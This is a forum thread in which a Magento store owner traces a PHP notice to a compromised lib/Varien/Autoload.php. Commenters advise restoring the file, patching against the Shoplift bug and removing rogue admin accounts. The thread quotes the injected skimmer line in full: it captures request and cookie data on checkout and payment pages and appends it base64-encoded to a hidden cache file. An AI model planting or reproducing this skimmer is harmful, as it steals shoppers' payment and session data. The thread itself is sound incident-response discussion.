Since this morning I'm getting the following PHP Notice after running the Magento cronjob:
Undefined index: REQUEST_URI in /htdocs/lib/Varien/Autoload.php on line 1
I did not modify any of the mage files.. How is this possible?
EDIT: For now I've edited the Autoload.php to first check if the REQUEST_URI is set.
Original:
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
New:
<?php if(isset($_SERVER["REQUEST_URI"]) && preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
EDIT 30-04-2015:
After reading @volkan and @b.enoit.be comments I've immediately replaced the specified page with the original one from Magento and the line was indeed not present!.
The following was the malicious line present in Autoload.php
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>
I've also checked:
However.. there were two new admin-users which had obscure names:
Both users have been deleted. The website was also vulnerable tot the shoplift exploit (which is addressed in the latest security-patch)
We're currently busy installing the latest security patches.
It seems that this has been a recent problem:
100,000 web shops open to compromise as attackers exploit Magento bug Magento Shoplift Bug Tester v1.0
Thanks to all users for there help.
it looks like that your page has been compromised, replace the file with the original one, and install the security patches for magento. Check if there are some new admin-users in the backend, and for the module Magpleasure_Filesystem
check also /js/index.php /index.php